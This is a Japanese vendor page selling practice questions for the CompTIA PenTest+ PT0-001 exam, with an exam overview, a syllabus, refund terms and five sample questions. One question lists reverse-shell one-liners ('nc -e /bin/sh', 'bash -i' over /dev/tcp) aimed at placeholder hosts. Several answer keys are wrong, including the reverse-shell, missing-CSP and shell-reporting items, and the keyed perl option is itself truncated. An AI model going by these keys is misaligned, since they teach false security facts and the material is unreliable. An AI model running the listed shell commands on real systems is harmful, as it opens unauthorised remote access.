お支払い完了後、ShikenPASSのCompTIA PenTest+ Certification(PT0-001)問題集はすぐにダウンロードできます。295問の練習問題を、待ち時間なしで今日からの学習に活かせます。
CompTIA PT0-001 試験概要:
| 認定ベンダー: | CompTIA |
|---|---|
| 試験名: | CompTIA PenTest+ 認定試験 |
| 試験番号: | PT0-001 |
| 認定の有効期間: | 3年間 |
| 試験時間: | 165 分 |
| 合格点: | 750点(100~900点の範囲で評価) |
| 関連資格: | CompTIA Network+ CompTIA Security+ CompTIA CySA+ |
| 対応言語: | 英語, 日本語 |
| 出題数: | 最大85問 |
| 試験形式: | 実践形式の問題, 多肢選択式問題 |
| 受験料: | 370米ドル |
| 推奨トレーニング: | CompTIA 公式学習ガイド CompTIA CertMaster Learn for PT0-001 |
| 受験申し込み: | Pearson VUE 受験申込みページ CompTIA 公式サイト |
| サンプル問題: | DOWNLOAD DEMO |
| 受験方法: | Pearson VUEの試験会場での受験、またはオンライン監督付き受験に対応 |
| 前提条件: | 推奨要件:CompTIA Network+、CompTIA Security+または同等の知識、および3~4年の実務経験を有するサイバーセキュリティまたはペネトレーションテストの業務経験。受験に必須の前提条件は設けられていません。 |
| 公式シラバスのURL: | https://www.comptia.org/certifications/pentest |
CompTIA PT0-001 試験シラバストピック:
| セクション | 比重 | 目標 |
|---|---|---|
| トピック 1: 情報収集と脆弱性スキャン | 22% | - 能動的偵察と列挙作業 - 脆弱性スキャンと結果の分析 - 受動的偵察とOSINTの活用 |
| トピック 2: 報告書作成と情報共有 | 18% | - 調査結果の分析とリスクの優先順位付け - 改善策の提案と事後のフォローアップ - 概要報告書および技術レポートの作成 |
| トピック 3: 攻撃手法と脆弱性の悪用 | 30% | - 侵入後の行動手法 - アプリケーションおよびクラウド環境を対象とした攻撃 - 無線ネットワークおよびRFを利用した攻撃 - ネットワークを対象とした攻撃と悪用手法 |
| トピック 4: ツールの活用とコードの分析 | 16% | - ツールの分類と用途別の活用方法 - ペネトレーションテスト用ツールの使用と分析 - スクリプトの解読:Bash、Python、Ruby、PowerShell |
| トピック 5: 計画と範囲の設定 | 14% | - 実施範囲と関与規則の定義 - 法的事項、コンプライアンス、倫理的考慮事項 - リスク評価と連絡体制の計画 |
CompTIA PenTest+ Certificationの疑問を解決するFAQ
PT0-001試験は、CompTIAが実施する公式の認定試験で、合格すると「PenTest+」の認定を取得できます。この認定は中級/プロフェッショナルレベルレベルに位置づけられています。関連する認定資格にはCompTIA Security+、CompTIA Network+、CompTIA CySA+などがあります。詳しい試験情報は、このページの試験概要やほかの質問項目でもご紹介しています。
PT0-001試験の問題数は最大85問、制限時間は165 分です。限られた時間で全問を解き切るには、1問ごとのペースを意識し、難しい問題に時間を使いすぎない進め方が重要です。ShikenPASSのテストエンジンには時間制限付きの模擬試験モードがあるため、本番と同じ時間配分で295問の練習問題に取り組めます。受験直前には、必ず時間を計った通し演習で時間感覚を確認しておきましょう。
PT0-001試験の合格に必要なスコアは750点(100~900点の範囲で評価)、受験料は370米ドルです。万が一不合格になった場合、再受験には受験料を再度全額支払う必要があるため、本番前の仕上がり確認が欠かせません。ShikenPASSの練習問題で模擬試験を繰り返し、安定して合格点を上回る状態になってから受験することをおすすめします。
はい。ShikenPASSではCompTIA PenTest+ Certification(PT0-001)問題集の無料サンプルをご用意しており、購入前に内容や品質をご確認いただけます。また、ご購入後は365日間無料で最新版にアップデートでき、更新期間終了後の更新も50%割引でご利用いただけます。
ShikenPASSでは「返金保証」をご用意しています。ご購入後60日以内にPT0-001試験を受験して不合格だった場合、受験票の写しと公式スコアレポート(Score Report)のPDFを試験後2日以内にご提出いただければ、7日以内に全額返金の手続きが完了します。なお、ご購入後3日以内の受験や、実際に受験されなかった場合、無料資料・期限切れのご注文は対象外となり、受験者名とお支払い者名の一致が必要です。返金の代わりに、同等の試験資料2点を無料でお受け取りいただき、元の製品の更新サービスを継続することも可能です。商品はお支払い完了後すぐにダウンロードでき、1分以内にメールでもお届けします。2時間経っても届かない場合はカスタマーサポートまでご連絡ください。インストールできるパソコンの台数に制限はありません。
PT0-001試験の出題範囲は、公式の発表では全部で5の分野に分かれています。主な分野としては、「報告書作成と情報共有」(18%)、「ツールの活用とコードの分析」(16%)、「情報収集と脆弱性スキャン」(22%)などが挙げられます。各分野に含まれる詳細なトピックは、上記の試験範囲一覧でご確認ください。
CompTIA PenTest+ Certification 認定 PT0-001 試験問題:
A penetration tester compromises a system that has unrestricted network over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester mostly like use?
- A. ssh superadmin@<DESTINATIONIP> -p 443
- B. nc -e /bin/sh <SOURCEIP> 443
- C. bash -i >& /dev/tcp/<DESTINATIONIP>/ 443 0>&1
- D. perl -e ' use SOCKET'; $i='<SOURCEIP>; $p='443;
正解:D 🗳️
解説: (ShikenPASS メンバーにのみ表示されます)
A penetration tester is designing a phishing campaign and wants to build list of users (or the target organization. Which of the following techniques would be the MOST appropriate? (Select TWO)
- A. Query an Internet WHOIS database.
- B. Harvest users from social networking sites.
- C. Socially engineer the corporate call center.
- D. Search posted job listings.
- E. Scrape the company website.
正解:B、E 🗳️
A penetration tester observes that several high numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?
- A. Implement a web application firewall
- B. Disable unneeded services.
- C. Transition the application to another port
- D. Filter port 443 to specific IP addresses
正解:B 🗳️
A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?
- A. Directory traversal attack
- B. Clickjacking attack
- C. Remote file inclusion attack
- D. Command injection attack
正解:A 🗳️
解説: (ShikenPASS メンバーにのみ表示されます)
A penetration tester is required to report installed shells on compromised systems. Which of the following is the reason?
- A. To allow the systems administrator to perform the cleanup
- B. To allow the developer to troubleshoot the vulnerability
- C. To allow the systems administrator to write a rule on the WAF
- D. To allow another security consultant access to the shell
正解:B 🗳️

クリック」
弊社は製品に自信を持っており、面倒な製品を提供していません。


-Matsuno

